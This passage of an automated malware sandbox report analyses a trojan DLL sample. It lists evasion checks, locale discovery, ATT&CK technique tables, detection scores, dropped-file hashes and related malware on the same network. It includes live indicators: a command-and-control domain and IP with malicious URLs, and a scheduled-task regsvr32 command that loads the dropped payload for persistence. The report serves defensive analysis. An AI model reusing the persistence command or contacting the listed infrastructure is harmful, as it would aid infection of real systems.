                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov ecx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov edx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD4606 mov eax, dword ptr fs:[00000030h]5_2_7FAD4606
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD467B mov eax, dword ptr fs:[00000030h]5_2_7FAD467B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD464A mov eax, dword ptr fs:[00000030h]5_2_7FAD464A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov ecx, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov ecx, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A6 mov eax, dword ptr fs:[00000030h]5_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8560 mov eax, dword ptr fs:[00000030h]5_2_7FAA8560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8C4D0 mov edx, dword ptr fs:[00000030h]5_2_7FA8C4D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA94430 mov ecx, dword ptr fs:[00000030h]5_2_7FA94430
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov edx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov ecx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84400 mov edx, dword ptr fs:[00000030h]5_2_7FA84400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84464 mov edx, dword ptr fs:[00000030h]5_2_7FA84464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84464 mov ecx, dword ptr fs:[00000030h]5_2_7FA84464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAF4358 mov eax, dword ptr fs:[00000030h]5_2_7FAF4358
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov edx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov eax, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E0 mov ecx, dword ptr fs:[00000030h]5_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABC270 mov eax, dword ptr fs:[00000030h]5_2_7FABC270
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_6C3E9C40 mov eax, dword ptr fs:[00000030h]9_2_6C3E9C40
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07AFE0 mov edx, dword ptr fs:[00000030h]9_2_7F07AFE0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07AFE0 mov eax, dword ptr fs:[00000030h]9_2_7F07AFE0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov edx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov ecx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov eax, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F052A30 mov edx, dword ptr fs:[00000030h]9_2_7F052A30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F065F00 mov ecx, dword ptr fs:[00000030h]9_2_7F065F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6570A GetProcessHeap,3_2_7EF6570A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC77833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC77833
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF51F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF51F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4E2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_7EF4E2C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4E077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF4E077
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6CC77833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6CC77833
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC1F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FAC1F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABE2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_7FABE2C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABE077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FABE077
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_6C3F7833 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_6C3F7833
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F081F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_7F081F06
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07E2C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_7F07E2C5
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07E077 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_7F07E077

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 94.159.113.213 443
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4DE2C cpuid 3_2_7EF4DE2C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_7EF678BF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_7EF676EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF677F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF675C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF672E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF67248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_7EF6736E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_7EF6101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF671FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_7EF66F5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_7EF60A9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_7FAD78BF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD77F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_7FAD76EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD75C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_7FAD736E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD72E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD7248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD71FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FAD101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_7FAD6F5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FAD0A9F
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,9_2_7F096F5B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F090A9F
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_7F0978BF
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F0977F0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_7F0976EA
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F0975C1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_7F09736E
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F097248
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F0972E3
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,9_2_7F0971FD
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,9_2_7F09101C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5B7F4 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,3_2_7EF5B7F4
                    Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 41 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Rundll32 | Cached Domain Credentials | 25 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    [Behavior graph: ID 1592430, Sample: file.dll, Startdate: 16/01/2025, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    file.dll | 11% | ReversingLabs | Win32.Trojan.Seheq |
                    file.dll | 14% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\8f08\user-PC\user-PC.winmd | 11% | ReversingLabs | Win32.Trojan.Seheq |

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php: | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/XH | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/kernel2.aspx | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/libraries_v2 | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/lowedCert_AutoUpdate_1 | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/ | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/OeGc | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/ | 100% | Avira URL Cloud | malware |
                    https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward | 100% | Avira URL Cloud | malware |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    corepatchcraft.com | 94.159.113.213 | true | true | | unknown
                    171.39.242.20.in-addr.arpa | unknown | unknown | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php | true | Avira URL Cloud: malware | unknown
                    https://corepatchcraft.com/kernel2.aspx | true | Avira URL Cloud: malware | unknown
                    https://corepatchcraft.com/libraries_v2 | true | Avira URL Cloud: malware | unknown

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://corepatchcraft.com/lowedCert_AutoUpdate_1 | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php: | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/OeGc | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/ | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/XH | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/ | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward | rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        94.159.113.213 | corepatchcraft.com | Russian Federation | 49531 | NETCOM-R-ASRU | true
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1592430
                        Start date and time:2025-01-16 06:01:05 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 50s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:30
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.dll
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@38/6@3/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .dll
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.45, 40.126.32.133, 20.109.210.53, 20.242.39.171, 4.245.163.56
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        Time | Type | Description
                        00:02:04 | API Interceptor | 87x Sleep call for process: rundll32.exe modified
                        00:02:05 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
                        00:02:09 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                        06:02:01 | Task Scheduler | Run new task: {6065D4E8-FC9E-40FB-8AA5-D02559EB2738} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        No context
                        No context
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        NETCOM-R-ASRU | kwari.ppc.elf | malicious | Unknown | 94.159.123.201
                        NETCOM-R-ASRU | 428925288166115476.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 16263291112008113012.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 39837570410621389.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 2086614421560622407.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 18297197931254531734.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 29339317121867311987.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | 1587812865951216473.js | malicious | Strela Downloader | 94.159.113.204
                        NETCOM-R-ASRU | jade.arm7.elf | malicious | Mirai | 94.159.123.210
                        NETCOM-R-ASRU | jade.spc.elf | malicious | Mirai | 94.159.123.238
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        37f463bf4616ecd445d4a1937da06e19 | Purchase Order No.5817-0001142025.bat.exe | malicious | Remcos, GuLoader | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe | malicious | Remcos, GuLoader | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | 153776434-874356550.05.exe | malicious | Unknown | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | download.bin.exe | malicious | Njrat, XRed | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | Handler.exe | malicious | DanaBot, PureLog Stealer, Vidar | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | BNXCXCJSD.jse | malicious | MassLogger RAT | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | 00.ps1 | malicious | PureCrypter, LummaC, LummaC Stealer | 94.159.113.213
                        37f463bf4616ecd445d4a1937da06e19 | 00.ps1 | malicious | PureCrypter, LummaC, LummaC Stealer | 94.159.113.213
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8412747748891497
                        Encrypted:false
                        SSDEEP:192:19NiwOD1U0BU/wjeTI/zuiFzZ24IO8dci:1XihDlBU/wjeuzuiFzY4IO8dci
                        MD5:CD3A3CD2CBC344EB014560E991D69F2A
                        SHA1:58C13CCFB0C7C3F33484DA094A5C78E0E4C0E86A
                        SHA-256:F3BB0F298819113C655D261E14C4485B046A0A67985A06F3B203EC9F4BE4383A
                        SHA-512:C3FE13CF07C6D955DF950A4BABD6C42F212EAB8AF38B336BA839E69EB864DA569EEFAAA6A9D7242E7886E4009495822E3D2FE3E6575EA684A7FC8B37B26B7905
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 16 05:02:07 2025, 0x1205a4 type
                        Category:dropped
                        Size (bytes):41634
                        Entropy (8bit):1.9534291111696984
                        Encrypted:false
                        SSDEEP:192:WPULkFSezpO5H4x56aZW3c2L3nv5zHYlv0772K:Hezs5HOlW3c2DBzHYtK
                        MD5:ACE08A6DF93C6512F939F40AAF7B7A8A
                        SHA1:C81A7B4E31BE0362FEFBB670D713D2A04E2D9432
                        SHA-256:581B8AF1EA0DE0AA36FBB4CFAF68BC6546557396EBEECE8D696B0AF6B9920D4D
                        SHA-512:32BD5E6B284BF61E1E2367728C7043942A4B9E5CC1851DB85BCE7BCB767C7FC4BE0F43C113235F9A295F569B2B4DDCD4A53ED29D42C81429B1642DEC09E12072
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8250
                        Entropy (8bit):3.689516905523936
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJYql6ICl/y6YpQB6jgmfTbqfprr89blbUsfy/jm:R6lXJp6ICI6Y6B6jgmfTe+lbHfi6
                        MD5:E6B496FE356F65DE6AB340FAB4AE2CCC
                        SHA1:57D0C506B0FC0C5E89A4EC4AE09194572FCDAFE2
                        SHA-256:3D900EB0D3D427CDD3C871F7BBF31DDB47DAEF69D2A90472B4423689B404A718
                        SHA-512:07478741160425610339DF5741077EDB58479C018612D088BD5E31426F32AF3B96575E89C7F00FCE79A03705F04258ECA798779E3D6CCD152D8B801E13E5F3A1
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4638
                        Entropy (8bit):4.4491689122403795
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zshJg77aI9ZjeWpW8VYlYm8M4JCdPvDFh1+q8/SRdGScSed:uIjfzI7/jf7VpJi1dJ3ed
                        MD5:094F551AE039B40B30F3F9678407F486
                        SHA1:A20BE86A3F2FC2B6318E664B51D7C21EB1019E53
                        SHA-256:B0FEAC1A4EDE9DEA1527772EDA872DAE50A1BD9716D87F6992BD54CBFE5B6816
                        SHA-512:574DFC5DF84EA4EBE41F812BA40169591FADD6323FE619741C9FE148402C0CED6DE2B93438CE5894D8F3512119409DB9A660A4320289F6DA56BF4019D430DD4B
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678004" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\rundll32.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
